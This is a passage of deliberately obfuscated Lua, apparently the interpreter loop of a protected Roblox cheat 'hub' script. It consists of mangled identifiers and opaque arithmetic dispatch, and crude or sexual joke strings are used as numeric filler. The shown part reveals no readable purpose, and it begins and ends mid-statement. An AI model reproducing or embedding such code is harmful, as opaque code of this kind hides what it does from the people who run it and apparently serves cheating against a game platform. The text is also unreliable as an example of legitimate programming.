];__[_[_l__]]=_[_llll];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[_llll];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[_llll];_l=_l+_ll;_=__l[_l];_l_=_[_lll]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[__lll]))_l=_l+_ll;_=__l[_l];__[_[___l]]=__l_[_[_llll]];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[____];_l=_l+_ll;_=__l[_l];__[_[___]]=_[__ll];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[_l_ll];_l=_l+_ll;_=__l[_l];_l_=_[_ll_]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[__lll]))_l=_l+_ll;_=__l[_l];__[_[_ll_l]][__[_[_llll]]]=__[_[___l_]];_l=_l+_ll;_=__l[_l];__[_[_lll]]=__l_[_[__ll]];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[___ll];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[__ll];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[___ll];_l=_l+_ll;_=__l[_l];_l_=_[_l__]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[__lll]))_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=__l_[_[__ll]];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[__lll];_l=_l+_ll;_=__l[_l];__[_[___]]=_[____];_l=_l+_ll;_=__l[_l];__[_[___]]=_[___ll];_l=_l+_ll;_=__l[_l];_l_=_[___l]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[__lll]))_l=_l+_ll;_=__l[_l];__[_[_ll_]][__[_[___ll]]]=__[_[__ll_]];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=__l_[_[___ll]];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[___ll];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[__lll];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=_[__lll];_l=_l+_ll;_=__l[_l];_l_=_[___l]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[_llll]))_l=_l+_ll;_=__l[_l];__[_[_ll_]]=__l_[_[_l_ll]];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=_[__lll];_l=_l+_ll;_=__l[_l];__[_[___]]=_[__ll];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[___ll];_l=_l+_ll;_=__l[_l];_l_=_[_ll_l]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[_llll]))_l=_l+_ll;_=__l[_l];__[_[_ll_]][__[_[__lll]]]=__[_[_lll_]];_l=_l+_ll;_=__l[_l];__[_[_l__]]=__l_[_[_l_ll]];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=_[_llll];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[__lll];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[_l_ll];_l=_l+_ll;_=__l[_l];_l_=_[_lll]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[___ll]))_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=__l_[_[____]];_l=_l+_ll;_=__l[_l];__[_[___]]=_[____];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=_[__ll];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[__ll];_l=_l+_ll;_=__l[_l];_l_=_[_lll]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[__ll]))_l=_l+_ll;_=__l[_l];__[_[_ll_]][__[_[__ll]]]=__[_[_ll__]];_l=_l+_ll;_=__l[_l];__[_[_l__]]=__l_[_[_llll]];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[_llll];break end while(_l_)/((0x3bd0/176))==3051 do if(__[_[_ll_l]]~=_[_ll__])then _l=_l+_l__l;else _l=_[____];end;break end;break;end break;end break;end break;end break;end while 2436==(_l_)/((6096-0xbf6))do _l_=(5626456)while __l_l<=(0xe5+-60)do _l_-= _l_ _l_=(5378775)while __l_l<=(258+(-12610/0x82))do _l_-= _l_ _l_=(754968)while((0x5cf8/136)+-#[[paster haha paster]])>=__l_l do _l_-= _l_ _l_=(12926582)while __l_l<=(373-0xda)do _l_-= _l_ local ___;local _l_;__[_[_ll_l]]=__[_[__lll]][_[__ll_]];_l=_l+_ll;_=__l[_l];_l_=_[_ll_];___=__[_[__lll]];__[_l_+1]=___;__[_l_]=___[_[__l__]];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[___ll];_l=_l+_ll;_=__l[_l];_l_=_[_lll]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[__lll]))_l=_l+_ll;_=__l[_l];if not __[_[_ll_l]]then _l=_l+_l__l;else _l=_[_l_ll];end;break;end while 4007==(_l_)/(((0x32d6-6539)-3249))do _l_=(9893376)while __l_l>(0x198-252)do _l_-= _l_ __[_[_ll_l]]=__[_[_l_ll]];break end while 2712==(_l_)/(((0x393f6/63)+-#"Oh, so you know what banging is? Bang every single woman in your location."))do local _lll;local _l_;__[_[_ll_l]]=_____[_[_l_ll]];_l=_l+_ll;_=__l[_l];__[_[___l]]=__[_[__lll]][_[__ll_]];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=__[_[_l_ll]][_[_lll_]];_l=_l+_ll;_=__l[_l];__[_[___]]=__[_[__lll]][_[_ll__]];_l=_l+_ll;_=__l[_l];_l_=_[_l__];_lll=__[_[_l_ll]];__[_l_+1]=_lll;__[_l_]=_lll[_[_ll__]];_l=_l+_ll;_=__l[_l];_l_=_[_ll_]__[_l_](__[_l_+_l__l])_l=_l+_ll;_=__l[_l];do return end;break end;break;end break;end while(_l_)/((531-0x11a))==3032 do _l_=(4106980)while __l_l<=(7155/0x2d)do _l_-= _l_ _l_=(4096274)while __l_l>((-#"hank hub is skidded wtf!1!1!"+(0x197098/68))/0x9b)do _l_-= _l_ local _l_;local _l__;local _l_ll,__l_l;local _ll_l;local _l_;__[_[_ll_]]=__l_[_[_llll]];_l=_l+_ll;_=__l[_l];__[_[___]]=__l_[_[___ll]];_l=_l+_ll;_=__l[_l];__[_[___l]]=__[_[____]][_[_l_l_]];_l=_l+_ll;_=__l[_l];_l_=_[_ll_];_ll_l=__[_[__lll]];__[_l_+1]=_ll_l;__[_l_]=_ll_l[_[__ll_]];_l=_l+_ll;_=__l[_l];_l_=_[_lll]_l_ll,__l_l=_lllll(__[_l_](__[_l_+_l__l]))____l=__l_l+_l_-_ll _l__=0;for _=_l_,____l do _l__=_l__+_ll;__[_]=_l_ll[_l__];end;_l=_l+_ll;_=__l[_l];_l_=_[___]_l_ll={__[_l_](_l_l(__,_l_+1,____l))};_l__=0;for _=_l_,_[__ll_]do _l__=_l__+_ll;__[_]=_l_ll[_l__];end _l=_l+_ll;_=__l[_l];_l=_[__ll];break end while 1846==(_l_)/((-49+(0x11d5-2297)))do local _=_[_ll_l];local _l=__[_];for _=_+1,____l do _l_lll(_l,__[_])end;break end;break;end while(_l_)/((0x88d+-72))==1940 do _l_=(3730636)while __l_l>(263+-0x67)do _l_-= _l_ __[_[_l__]][_[_l_ll]]=__[_[___l_]];break end while 3367==(_l_)/((0x2dfc8/170))do local _l=_[_ll_l];local _ll=__[_l];for _=_l+1,_[_l_ll]do _l_lll(_ll,__[_])end;break end;break;end break;end break;end while(_l_)/((615777/0xf9))==2175 do _l_=(5816337)while __l_l<=(0x102+-93)do _l_-= _l_ _l_=(6703534)while(342-0xb3)>=__l_l do _l_-= _l_ _l_=(656560)while __l_l>(442-0x118)do _l_-= _l_ __[_[_ll_l]]={};break end while 566==(_l_)/((2381-0x4c5))do local _l_;__[_[_ll_]]=__l_[_[__lll]];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=_[___ll];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=_[__ll];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[__lll];_l=_l+_ll;_=__l[_l];_l_=_[_ll_]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[__lll]))_l=_l+_ll;_=__l[_l];_l_=_[_ll_]__[_l_](__[_l_+_l__l])break end;break;end while 2389==(_l_)/((((0x2395939/241)/55)+-#"v3 has it"))do _l_=(1846928)while(-122+0x11e)<__l_l do _l_-= _l_ local _lll_;local __l__,__ll_;local __l_l;local _l_;__[_[_ll_]]=__l_[_[__ll]];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[__lll];_l=_l+_ll;_=__l[_l];__[_[___]]=_[__lll];_l=_l+_ll;_=__l[_l];__[_[___]]=_[_llll];_l=_l+_ll;_=__l[_l];_l_=_[_l__]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[_llll]))_l=_l+_ll;_=__l[_l];__[_[_lll]][_[__ll]]=__[_[_ll__]];_l=_l+_ll;_=__l[_l];__[_[_l__]]=__l_[_[___ll]];_l=_l+_ll;_=__l[_l];_l_=_[_lll];__l_l=__[_[___ll]];__[_l_+1]=__l_l;__[_l_]=__l_l[_[___l_]];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[____];_l=_l+_ll;_=__l[_l];_l_=_[_ll_]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[____]))_l=_l+_ll;_=__l[_l];__[_[___l]]=__[_[__ll]][_[___l_]];_l=_l+_ll;_=__l[_l];__[_[_lll]]=__[_[_l_ll]][_[_l_l_]];_l=_l+_ll;_=__l[_l];_l_=_[___];__l_l=__[_[__lll]];__[_l_+1]=__l_l;__[_l_]=__l_l[_[_l_l_]];_l=_l+_ll;_=__l[_l];__[_[___]]=__l_[_[___ll]];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=__[_[____]];_l=_l+_ll;_=__l[_l];_l_=_[_l__]__l__,__ll_=_lllll(__[_l_](__[_l_+_l__l]))____l=__ll_+_l_-_ll _lll_=0;for _=_l_,____l do _lll_=_lll_+_ll;__[_]=__l__[_lll_];end;_l=_l+_ll;_=__l[_l];_l_=_[_l__]__[_l_](_l_l(__,_l_+_l__l,____l))break end while(_l_)/((-#'moons.ec/purchase'+(0x925a/26)))==1297 do local _l_;local _ll_;local ____,___ll;local _llll;local _l_;__[_[_l__]]=__l_[_[__lll]];_l=_l+_ll;_=__l[_l];__[_[___]]=__l_[_[_l_ll]];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=__[_[__ll]][_[___l_]];_l=_l+_ll;_=__l[_l];_l_=_[___l];_llll=__[_[__lll]];__[_l_+1]=_llll;__[_l_]=_llll[_[_ll__]];_l=_l+_ll;_=__l[_l];_l_=_[_lll]____,___ll=_lllll(__[_l_](__[_l_+_l__l]))____l=___ll+_l_-_ll _ll_=0;for _=_l_,____l do _ll_=_ll_+_ll;__[_]=____[_ll_];end;_l=_l+_ll;_=__l[_l];_l_=_[___]____={__[_l_](_l_l(__,_l_+1,____l))};_ll_=0;for _=_l_,_[_lll_]do _ll_=_ll_+_ll;__[_]=____[_ll_];end _l=_l+_ll;_=__l[_l];_l=_[_l_ll];break end;break;end break;end while(_l_)/((0xf30+(-36+-0x21)))==1523 do _l_=(3014144)while __l_l<=(0x72d0/176)do _l_-= _l_ _l_=(459914)while((-#"real"+(23+-0x23))+182)<__l_l do _l_-= _l_ local _ll_;local _l_;_l_=_[_l__]__[_l_](_l_l(__,_l_+_l__l,_[__lll]))_l=_l+_ll;_=__l[_l];__[_[___]]=_[____];_l=_l+_ll;_=__l[_l];_l_=_[___l];_ll_=__[_[__ll]];__[_l_+1]=_ll_;__[_l_]=_ll_[__[_[___l_]]];_l=_l+_ll;_=__l[_l];__[_[___l]]=__l_[_[_llll]];_l=_l+_ll;_=__l[_l];__[_[___]]=_[___ll];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[___ll];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[_l_ll];_l=_l+_ll;_=__l[_l];_l_=_[___]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[__ll]))_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=(_[___ll]~=0);break end while(_l_)/((-#"You have deobuscated the code well done"+(0x10cc/25)))==3458 do local _l_;__[_[_ll_l]]();_l=_l+_ll;_=__l[_l];__[_[_l__]]=__l_[_[___ll]];_l=_l+_ll;_=__l[_l];__[_[___]]=__l_[_[____]];_l=_l+_ll;_=__l[_l];__[_[___l]]=__[_[__ll]][_[__l__]];_l=_l+_ll;_=__l[_l];__[_[___]]=_[__ll];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=_[_l_ll];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[_llll];_l=_l+_ll;_=__l[_l];_l_=_[_l__]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[_l_ll]))_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[____];_l=_l+_ll;_=__l[_l];_l_=_[_ll_]__[_l_](_l_l(__,_l_+_l__l,_[___ll]))_l=_l+_ll;_=__l[_l];__[_[_l__]]=__l_[_[____]];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=_[_l_ll];_l=_l+_ll;_=__l[_l];_l_=_[_ll_l]__[_l_](__[_l_+_l__l])_l=_l+_ll;_=__l[_l];__[_[___l]]=__l_[_[_llll]];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=__l_[_[_llll]];_l=_l+_ll;_=__l[_l];__[_[_l__]]=__[_[___ll]][_[__ll_]];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[_llll];_l=_l+_ll;_=__l[_l];__[_[___]]=_[_l_ll];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[__lll];_l=_l+_ll;_=__l[_l];_l_=_[___]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[__lll]))_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=_[_llll];_l=_l+_ll;_=__l[_l];_l_=_[___]__[_l_](_l_l(__,_l_+_l__l,_[__lll]))_l=_l+_ll;_=__l[_l];__[_[_l__]]=__l_[_[_l_ll]];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=_[__lll];_l=_l+_ll;_=__l[_l];_l_=_[_l__]__[_l_](__[_l_+_l__l])_l=_l+_ll;_=__l[_l];__[_[___l]]=__l_[_[__ll]];_l=_l+_ll;_=__l[_l];__[_[___l]]=__l_[_[____]];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=__[_[____]][_[_l_l_]];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[____];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[_llll];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[____];_l=_l+_ll;_=__l[_l];_l_=_[_l__]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[____]))_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[__ll];_l=_l+_ll;_=__l[_l];_l_=_[_ll_]__[_l_](_l_l(__,_l_+_l__l,_[___ll]))_l=_l+_ll;_=__l[_l];__[_[_ll_]]=__l_[_[____]];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[___ll];_l=_l+_ll;_=__l[_l];_l_=_[_l__]__[_l_](__[_l_+_l__l])_l=_l+_ll;_=__l[_l];__[_[___l]]=__l_[_[____]];_l=_l+_ll;_=__l[_l];__[_[_l__]]=__l_[_[____]];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=__[_[____]][_[__l__]];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[__ll];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[_llll];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[___ll];_l=_l+_ll;_=__l[_l];_l_=_[_ll_l]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[_llll]))_l=_l+_ll;_=__l[_l];__[_[___l]]=_[_l_ll];_l=_l+_ll;_=__l[_l];_l_=_[___l]__[_l_](_l_l(__,_l_+_l__l,_[_l_ll]))_l=_l+_ll;_=__l[_l];__[_[_lll]]=__l_[_[____]];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[___ll];_l=_l+_ll;_=__l[_l];_l_=_[___]__[_l_](__[_l_+_l__l])_l=_l+_ll;_=__l[_l];__[_[___l]]=__l_[_[__ll]];_l=_l+_ll;_=__l[_l];__[_[_l__]]=__l_[_[____]];_l=_l+_ll;_=__l[_l];__[_[___]]=__[_[____]][_[___l_]];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[___ll];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=_[__ll];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[_l_ll];_l=_l+_ll;_=__l[_l];_l_=_[___]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[__ll]))_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[_llll];_l=_l+_ll;_=__l[_l];_l_=_[_ll_]__[_l_](_l_l(__,_l_+_l__l,_[_l_ll]))_l=_l+_ll;_=__l[_l];__[_[_ll_]]=__l_[_[_llll]];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=_[____];_l=_l+_ll;_=__l[_l];_l_=_[_lll]__[_l_](__[_l_+_l__l])_l=_l+_ll;_=__l[_l];__[_[___l]]=__l_[_[_llll]];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=__l_[_[_llll]];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=__[_[_llll]][_[_l_l_]];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[___ll];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[_llll];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[____];_l=_l+_ll;_=__l[_l];_l_=_[___l]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[__lll]))_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[_llll];_l=_l+_ll;_=__l[_l];_l_=_[_l__]__[_l_](_l_l(__,_l_+_l__l,_[____]))_l=_l+_ll;_=__l[_l];__[_[___l]]=__l_[_[__lll]];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[___ll];_l=_l+_ll;_=__l[_l];_l_=_[_ll_l]__[_l_](__[_l_+_l__l])_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=__l_[_[_l_ll]];_l=_l+_ll;_=__l[_l];__[_[_lll]]=__l_[_[__lll]];_l=_l+_ll;_=__l[_l];__[_[___]]=__[_[__ll]][_[___l_]];_l=_l+_ll;_=__l[_l];__[_[_lll]]=__[_[____]][_[_l_l_]];_l=_l+_ll;_=__l[_l];__[_[___l]]=__[_[__lll]][_[___l_]];_l=_l+_ll;_=__l[_l];__[_[___]]=__[_[____]][_[_ll__]];_l=_l+_ll;_=__l[_l];__[_[___]]=__[_[__ll]][_[_ll__]];break end;break;end while 1624==(_l_)/((-109+0x7ad))do _l_=(3394683)while __l_l>(-0x1f+199)do _l_-= _l_ local _l_;__[_[_ll_l]]=__l_[_[__ll]];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[__ll];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[__lll];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[___ll];_l=_l+_ll;_=__l[_l];_l_=_[_lll]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[____]))_l=_l+_ll;_=__l[_l];_l_=_[_lll]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[____]))_l=_l+_ll;_=__l[_l];if __[_[_lll]]then _l=_l+_ll;else _l=_[_llll];end;break end while 2131==(_l_)/((-#'Before you marry someone make them use a computer with slow internet to see who they really are'+((-127+0x1648f)/54)))do local _l_;__[_[_lll]]=__l_[_[_l_ll]];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[___ll];_l=_l+_ll;_=__l[_l];__[_[___]]=_[__lll];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[__lll];_l=_l+_ll;_=__l[_l];_l_=_[_ll_l]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[__lll]))_l=_l+_ll;_=__l[_l];_l_=_[___l]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[_l_ll]))_l=_l+_ll;_=__l[_l];if not __[_[___l]]then _l=_l+_l__l;else _l=_[___ll];end;break end;break;end break;end break;end break;end while 1496==(_l_)/(((-#"I kissed wally irl"+(0xc0dcb-395040))/105))do _l_=(1399878)while(424-0xf7)>=__l_l do _l_-= _l_ _l_=(9599558)while(466-0x125)>=__l_l do _l_-= _l_ _l_=(5229104)while(0xe7+-60)>=__l_l do _l_-= _l_ _l_=(7963536)while __l_l>((-29+-0x3b)+258)do _l_-= _l_ local _lll;local _l_;_l_=_[_ll_]__[_l_](_l_l(__,_l_+_l__l,_[_l_ll]))_l=_l+_ll;_=__l[_l];__[_[___]]=_[___ll];_l=_l+_ll;_=__l[_l];_l_=_[_l__];_lll=__[_[_l_ll]];__[_l_+1]=_lll;__[_l_]=_lll[__[_[_lll_]]];_l=_l+_ll;_=__l[_l];__[_[_l__]]=__l_[_[_llll]];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[_l_ll];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[_llll];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[_llll];_l=_l+_ll;_=__l[_l];_l_=_[_ll_]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[_llll]))_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=(_[__lll]~=0);break end while 3836==(_l_)/(((0x20ad-4213)/2))do __[_[_ll_]]=__[_[_llll]][_[__l__]];break end;break;end while 3914==(_l_)/(((0x2d2ab/133)+-#[[federal u suck let me do fucking emojis in here asshole]]))do _l_=(8045492)while __l_l>(-#"troll the teibal"+(0x190-212))do _l_-= _l_ local _ll=_[___l];local _l=__[_[__lll]];__[_ll+1]=_l;__[_ll]=_l[__[_[__l__]]];break end while(_l_)/(((-0x35+(-#[[guys why isnt localplayer working on server scripts please help i am noob]]+(294129/0x63)))+-#[[guys listen... sussex XD]]))==2852 do local _l_;local ___;local _lll,_llll;local ___l;local _l_;__[_[_ll_l]]=__l_[_[__lll]];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=__l_[_[__ll]];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=__[_[__ll]][_[__l__]];_l=_l+_ll;_=__l[_l];_l_=_[_l__];___l=__[_[__ll]];__[_l_+1]=___l;__[_l_]=___l[_[__ll_]];_l=_l+_ll;_=__l[_l];_l_=_[_l__]_lll,_llll=_lllll(__[_l_](__[_l_+_l__l]))____l=_llll+_l_-_ll ___=0;for _=_l_,____l do ___=___+_ll;__[_]=_lll[___];end;_l=_l+_ll;_=__l[_l];_l_=_[_ll_]_lll={__[_l_](_l_l(__,_l_+1,____l))};___=0;for _=_l_,_[_lll_]do ___=___+_ll;__[_]=_lll[___];end _l=_l+_ll;_=__l[_l];_l=_[____];break end;break;end break;end while 2846==(_l_)/((236110/0x46))do _l_=(2994430)while(-0x6f+286)>=__l_l do _l_-= _l_ _l_=(2858496)while(-105+0x117)<__l_l do _l_-= _l_ local _l_;__[_[_l__]]=__l_[_[_llll]];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[___ll];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=_[___ll];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[_llll];_l=_l+_ll;_=__l[_l];_l_=_[___l]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[___ll]))_l=_l+_ll;_=__l[_l];_l_=_[___l]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[___ll]))_l=_l+_ll;_=__l[_l];if not __[_[___]]then _l=_l+_l__l;else _l=_[_l_ll];end;break end while(_l_)/((0x28e00/(557-0x153)))==3722 do local _l_;__[_[___l]]=__[_[__ll]][_[__l__]];_l=_l+_ll;_=__l[_l];__[_[_lll]]=__[_[__lll]][_[__ll_]];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=__l_[_[_l_ll]];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=__[_[____]][_[_l_l_]];_l=_l+_ll;_=__l[_l];__[_[___]]=__[_[__ll]][_[___l_]];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=__l_[_[____]];_l=_l+_ll;_=__l[_l];__[_[_l__]]=__[_[_l_ll]][_[_ll__]];_l=_l+_ll;_=__l[_l];__[_[_l__]]=__[_[_llll]];_l=_l+_ll;_=__l[_l];_l_=_[_l__]__[_l_](__[_l_+_l__l])_l=_l+_ll;_=__l[_l];__[_[_lll]]={};_l=_l+_ll;_=__l[_l];__[_[_ll_]]=__l_[_[___ll]];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[____];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=_[_l_ll];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=_[__lll];_l=_l+_ll;_=__l[_l];_l_=_[___l]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[___ll]))_l=_l+_ll;_=__l[_l];__[_[_ll_]]=__l_[_[___ll]];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=_[__lll];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=_[___ll];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[__ll];_l=_l+_ll;_=__l[_l];_l_=_[___l]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[_l_ll]))_l=_l+_ll;_=__l[_l];__[_[_ll_l]][__[_[____]]]=__[_[_lll_]];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=__l_[_[_l_ll]];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[___ll];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[____];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[_llll];_l=_l+_ll;_=__l[_l];_l_=_[___]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[__lll]))_l=_l+_ll;_=__l[_l];__[_[___l]]=__l_[_[____]];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[___ll];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[_l_ll];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=_[__lll];_l=_l+_ll;_=__l[_l];_l_=_[_ll_l]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[_llll]))_l=_l+_ll;_=__l[_l];__[_[___]]=__[_[_l_ll]][__[_[___l_]]];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=__[_[_llll]][_[__ll_]];_l=_l+_ll;_=__l[_l];__[_[___]][__[_[__ll]]]=__[_[_lll_]];_l=_l+_ll;_=__l[_l];__[_[___]]=__l_[_[__ll]];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[__ll];_l=_l+_ll;_=__l[_l];__[_[___]]=_[_llll];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[__ll];_l=_l+_ll;_=__l[_l];_l_=_[_lll]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[_l_ll]))_l=_l+_ll;_=__l[_l];__[_[___l]]=__l_[_[_llll]];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=_[__lll];_l=_l+_ll;_=__l[_l];__[_[___]]=_[__ll];_l=_l+_ll;_=__l[_l];__[_[___]]=_[__lll];_l=_l+_ll;_=__l[_l];_l_=_[_lll]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[__lll]))_l=_l+_ll;_=__l[_l];__[_[_ll_]]=__[_[___ll]][__[_[_l_l_]]];_l=_l+_ll;_=__l[_l];__[_[___]]=__[_[__ll]][_[_ll__]];_l=_l+_ll;_=__l[_l];__[_[_l__]][__[_[__lll]]]=__[_[_lll_]];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=__l_[_[____]];_l=_l+_ll;_=__l[_l];__[_[___]]=_[_llll];_l=_l+_ll;_=__l[_l];__[_[___]]=_[__ll];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[_llll];_l=_l+_ll;_=__l[_l];_l_=_[_ll_l]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[__ll]))_l=_l+_ll;_=__l[_l];__[_[_lll]]=__l_[_[_l_ll]];_l=_l+_ll;_=__l[_l];__[_[___]]=_[_l_ll];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[____];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[____];_l=_l+_ll;_=__l[_l];_l_=_[___l]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[____]))_l=_l+_ll;_=__l[_l];__[_[___l]]=__[_[__lll]][__[_[__ll_]]];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=__[_[_llll]][_[___l_]];_l=_l+_ll;_=__l[_l];__[_[_ll_l]][__[_[___ll]]]=__[_[_lll_]];_l=_l+_ll;_=__l[_l];__[_[___l]]=__l_[_[____]];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[_l_ll];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[_l_ll];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[____];_l=_l+_ll;_=__l[_l];_l_=_[___l]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[___ll]))_l=_l+_ll;_=__l[_l];__[_[_ll_]]=__l_[_[__lll]];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=_[__ll];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[_llll];_l=_l+_ll;_=__l[_l];__[_[___]]=_[___ll];_l=_l+_ll;_=__l[_l];_l_=_[___l]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[____]))_l=_l+_ll;_=__l[_l];__[_[___]]=__[_[__ll]][__[_[___l_]]];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=__[_[__ll]][_[_l_l_]];_l=_l+_ll;_=__l[_l];__[_[_lll]][__[_[___ll]]]=__[_[_ll__]];_l=_l+_ll;_=__l[_l];__[_[___l]]=__l_[_[_llll]];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[_llll];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[____];_l=_